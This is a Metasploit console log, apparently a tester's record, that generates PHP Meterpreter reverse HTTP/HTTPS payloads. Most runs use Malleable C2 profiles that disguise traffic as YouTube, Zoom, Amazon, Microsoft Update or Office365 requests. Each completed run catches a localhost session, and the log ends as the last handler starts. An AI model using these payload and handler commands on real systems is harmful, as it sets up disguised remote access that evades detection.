resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/youtube_video.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/youtube_video.profile
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> generate -f raw -o /tmp/msf.php
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Writing 60424 bytes to /tmp/msf.php...
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Payload Handler Started as Job 0
msf payload(php/meterpreter_reverse_http) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTP reverse handler on http://127.0.0.1:4242
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 5r43u2zy) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 5r43u2zy) Redirecting stageless: URI '/watch' with UA 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko)' -> UUID YOA5pfUnnDBkfndxDlGUMwbiwgyKVCeYQsJzLJffP7eNn5epsKfxo8FAMpEp62tFOMH_pMl_B1u30ZENZe1chYMCCCOPwjW_MgWDgiWJb7U8Y0xZUjT7g5Cu_-
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 5r43u2zy) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 5r43u2zy) Attaching orphaned/stageless session...
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 5r43u2zy) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.php is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:44268) at 2026-06-15 14:30:06 +0200

msf payload(php/meterpreter_reverse_http) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux cachyos-x8664 7.0.12-1-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 13 Jun 2026 11:49:00 +0000 x86_64
Architecture    : x64
System Language : en_US.UTF-8
Meterpreter     : php/linux
meterpreter > getuid
Server username: ms

zoom.profile

resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> use payload/php/meterpreter_reverse_http
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/zoom.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/zoom.profile
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> generate -f raw -o /tmp/msf.php
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Writing 60540 bytes to /tmp/msf.php...
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Payload Handler Started as Job 0
msf payload(php/meterpreter_reverse_http) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTP reverse handler on http://127.0.0.1:4242
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: byelkd06) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: byelkd06) Redirecting stageless: URI '/s/58462514417 /wc/58462514417' with UA 'Mozilla/5.0 (iPhone; CPU iPhone OS 12_1_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/16C104' -> UUID UXho1qHajOZIGlsVIjW51w9pZ0hS_pH0fSaiY-pwd476ZHx6zAJETNS98yk-YYUmcmB5jPsKzUXZnE2
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: byelkd06) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: byelkd06) Attaching orphaned/stageless session...
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: byelkd06) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.php is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:35832) at 2026-06-15 14:36:30 +0200

msf payload(php/meterpreter_reverse_http) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux cachyos-x8664 7.0.12-1-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 13 Jun 2026 11:49:00 +0000 x86_64
Architecture    : x64
System Language : en_US.UTF-8
Meterpreter     : php/linux
meterpreter > getuid
Server username: ms

staged

resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> use payload/php/meterpreter/reverse_http
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> generate -f raw -o /tmp/msf.php
[*] Writing 580 bytes to /tmp/msf.php...
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> to_handler
[*] Payload Handler Started as Job 0
msf payload(php/meterpreter/reverse_http) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTP reverse handler on http://127.0.0.1:4242
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: sg9rwbzy) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: sg9rwbzy) Staging php payload (67426 bytes) ...
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: sg9rwbzy) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.php is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:37448) at 2026-06-15 14:41:09 +0200

msf payload(php/meterpreter/reverse_http) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux cachyos-x8664 7.0.12-1-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 13 Jun 2026 11:49:00 +0000 x86_64
Architecture    : x64
System Language : en_US.UTF-8
Meterpreter     : php/linux
meterpreter > getuid
Server username: ms

https

stageless

resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> use payload/php/meterpreter_reverse_https
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> generate -f raw -o /tmp/msf.php
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Writing 59844 bytes to /tmp/msf.php...
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Payload Handler Started as Job 0
msf payload(php/meterpreter_reverse_https) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTPS reverse handler on https://127.0.0.1:4242
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 35uj7m0n) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 35uj7m0n) Redirecting stageless: URI '/0RaxNA1dM2TNA94MpywxKwojXbGJ3i0MpvZHL7STULM0OyXbw0729ujBu54S' with UA 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.2903.86' -> UUID 0RaxNA1dM2TNA94Mpywx3wnmnXuIg9yB4Tih9FvojbGRopl694NgA1rmYnZDSoNkyhBU-VPhijOB3599PDI5O02lZFfs0qpEj5Ls3s_C
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 35uj7m0n) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 35uj7m0n) Attaching orphaned/stageless session...
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 35uj7m0n) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.php is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:46244) at 2026-06-15 15:23:41 +0200

msf payload(php/meterpreter_reverse_https) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux cachyos-x8664 7.0.12-1-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 13 Jun 2026 11:49:00 +0000 x86_64
Architecture    : x64
System Language : en_US.UTF-8
Meterpreter     : php/linux
meterpreter > getuid
Server username: ms

amazon.profile

resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> use payload/php/meterpreter_reverse_https
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/amazon.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/amazon.profile
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> generate -f raw -o /tmp/msf.php
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Writing 60444 bytes to /tmp/msf.php...
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Payload Handler Started as Job 0

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
msf payload(php/meterpreter_reverse_https) > [*] Started HTTPS reverse handler on https://127.0.0.1:4242
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: le06ndxp) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: le06ndxp) Redirecting stageless: URI '/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books' with UA 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko' -> UUID Ci0yYIdSUwCyL6Eg2ABPGgMT0O8qYsiD8LTL5qjn1yTJAyR_DSvt2HihYEfoRvIOMhbWngbtOn25g1I5G0K
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: le06ndxp) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: le06ndxp) Attaching orphaned/stageless session...
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: le06ndxp) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.php is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:40612) at 2026-06-15 15:25:10 +0200

msf payload(php/meterpreter_reverse_https) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux cachyos-x8664 7.0.12-1-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 13 Jun 2026 11:49:00 +0000 x86_64
Architecture    : x64
System Language : en_US.UTF-8
Meterpreter     : php/linux
meterpreter > getuid
Server username: ms

bing_maps.profile

resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> use payload/php/meterpreter_reverse_https
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/bing_maps.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/bing_maps.profile
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> generate -f raw -o /tmp/msf.php
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Writing 60520 bytes to /tmp/msf.php...
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Payload Handler Started as Job 0
msf payload(php/meterpreter_reverse_https) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTPS reverse handler on https://127.0.0.1:4242
                                             [!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: vl7fcz3p) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: vl7fcz3p) Redirecting stageless: URI '/maps/overlaybfpr' with UA 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36' -> UUID xI9MB4D70hl_sGy_FZ-C1g1UB6GYFaaI9oRgtVXqfycfNRHJ9lj9GliEKQw4k-kXjNx_q9zDlHVaysUzFDDbBER_
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: vl7fcz3p) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: vl7fcz3p) Attaching orphaned/stageless session...
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: vl7fcz3p) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.php is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:43076) at 2026-06-15 15:26:00 +0200

msf payload(php/meterpreter_reverse_https) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux cachyos-x8664 7.0.12-1-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 13 Jun 2026 11:49:00 +0000 x86_64
Architecture    : x64
System Language : en_US.UTF-8
Meterpreter     : php/linux
meterpreter > getuid
Server username: ms

bingsearch_getonly.profile

resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> use payload/php/meterpreter_reverse_https
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/bingsearch_getonly.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/bingsearch_getonly.profile
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> generate -f raw -o /tmp/msf.php
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Writing 60536 bytes to /tmp/msf.php...
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Payload Handler Started as Job 0
msf payload(php/meterpreter_reverse_https) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTPS reverse handler on https://127.0.0.1:4242
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: jh1p79sq) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: jh1p79sq) Redirecting stageless: URI '/search/' with UA 'Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko' -> UUID VIFGFDpMQX_YxcvKsuom8w1_3lsNH_MVjzs1SW-sgtrGZInVfLE1WaychGHKBZ7btq0qd5TnsU1FdFcu2grh0
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: jh1p79sq) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: jh1p79sq) Attaching orphaned/stageless session...
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: jh1p79sq) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.php is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:54174) at 2026-06-15 15:29:27 +0200

msf payload(php/meterpreter_reverse_https) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux cachyos-x8664 7.0.12-1-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 13 Jun 2026 11:49:00 +0000 x86_64
Architecture    : x64
System Language : en_US.UTF-8
Meterpreter     : php/linux
meterpreter > getuid
Server username: ms

microsoft_update.profile

resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> use payload/php/meterpreter_reverse_https
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/microsoftupdate_getonly.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/microsoftupdate_getonly.profile
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> generate -f raw -o /tmp/msf.php
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Writing 60112 bytes to /tmp/msf.php...
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Payload Handler Started as Job 0

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
msf payload(php/meterpreter_reverse_https) > [*] Started HTTPS reverse handler on https://127.0.0.1:4242
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: hs6reqio) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: hs6reqio) Redirecting stageless: URI '/c/msdownload/update/others/2016/12/29136388_/VVlDVHphZzBrYXBBMlZQV0t2YS1PQUNxV0d6TGY4VEdfbE5CcQ.cab' with UA 'Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40' -> UUID UYCTzag0kapA2VPWKva-NQJJXfvkVniSa7YTj95QiUlDKmTSbHU1-QE6hWQpvykiOQRmDmbwpR8pFwQv3lA
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: hs6reqio) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: hs6reqio) Attaching orphaned/stageless session...
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: hs6reqio) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.php is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:44260) at 2026-06-15 15:32:29 +0200

msf payload(php/meterpreter_reverse_https) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux cachyos-x8664 7.0.12-1-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 13 Jun 2026 11:49:00 +0000 x86_64
Architecture    : x64
System Language : en_US.UTF-8
Meterpreter     : php/linux
meterpreter > getuid
Server username: ms

mscrl

resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> use payload/php/meterpreter_reverse_https
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/mscrl.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/mscrl.profile
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> generate -f raw -o /tmp/msf.php
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Writing 60468 bytes to /tmp/msf.php...
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Payload Handler Started as Job 0
msf payload(php/meterpreter_reverse_https) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTPS reverse handler on https://127.0.0.1:4242
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: s8ta45lq) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: s8ta45lq) Redirecting stageless: URI '/pki/mscorp/cps/default.htm' with UA 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36' -> UUID QDHSOIjGvFDSrMGjuIMtxAwUp7TJ5kQ8LYvfOgTNlgoX63738Vqzlew4uaVPVq4ZPVoBFJbbz-zTY55yWvdkfORdjfvvTrF1L
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: s8ta45lq) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: s8ta45lq) Attaching orphaned/stageless session...
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: s8ta45lq) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.php is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:36680) at 2026-06-15 15:34:33 +0200

msf payload(php/meterpreter_reverse_https) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
geComputer        : cachyos-x8664
OS              : Linux cachyos-x8664 7.0.12-1-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 13 Jun 2026 11:49:00 +0000 x86_64
Architecture    : x64
System Language : en_US.UTF-8
Meterpreter     : php/linux
meterpreter > getuid
Server username: ms

msnbcvideo_getonly.profile

resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> use payload/php/meterpreter_reverse_https
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/msnbcvideo_getonly.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/msnbcvideo_getonly.profile
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> generate -f raw -o /tmp/msf.php
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Writing 60464 bytes to /tmp/msf.php...
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Payload Handler Started as Job 0
msf payload(php/meterpreter_reverse_https) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTPS reverse handler on https://127.0.0.1:4242
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: um2g6b97) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: um2g6b97) Redirecting stageless: URI '/z/msnbc2_live01@9615/manifest.f4m' with UA 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko' -> UUID BpUrpbbE_vv_cOx_lV8AsghpqCHemm2dTtV-kUJEjiL9ADX48oUn6Uigeg36I38X1POEKHkjvhu0v
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: um2g6b97) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: um2g6b97) Attaching orphaned/stageless session...
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: um2g6b97) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.php is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:40660) at 2026-06-15 15:36:03 +0200

msf payload(php/meterpreter_reverse_https) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux cachyos-x8664 7.0.12-1-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 13 Jun 2026 11:49:00 +0000 x86_64
Architecture    : x64
System Language : en_US.UTF-8
Meterpreter     : php/linux
meterpreter > getuid
Server username: ms

office365.profile

resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> use payload/php/meterpreter_reverse_https
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/office365_calendar.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/office365_calendar.profile
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> generate -f raw -o /tmp/msf.php
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Writing 60352 bytes to /tmp/msf.php...
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Payload Handler Started as Job 0
msf payload(php/meterpreter_reverse_https) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTPS reverse handler on https://127.0.0.1:4242
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: gjv5yas1) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: gjv5yas1) Redirecting stageless: URI '/owa/' with UA 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko)' -> UUID zBh3Tn6nln32bOVjnFz3DwgZev0OcSiOP
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: gjv5yas1) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: gjv5yas1) Attaching orphaned/stageless session...
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: gjv5yas1) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.php is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:47122) at 2026-06-15 15:43:00 +0200

msf payload(php/meterpreter_reverse_https) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux cachyos-x8664 7.0.12-1-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 13 Jun 2026 11:49:00 +0000 x86_64
Architecture    : x64
System Language : en_US.UTF-8
Meterpreter     : php/linux
meterpreter > getuid
Server username: ms
meterpreter >

oscp.profile

resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> use payload/php/meterpreter_reverse_https
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/oscp.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/oscp.profile
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> generate -f raw -o /tmp/msf.php
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Writing 59920 bytes to /tmp/msf.php...
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Payload Handler Started as Job 0

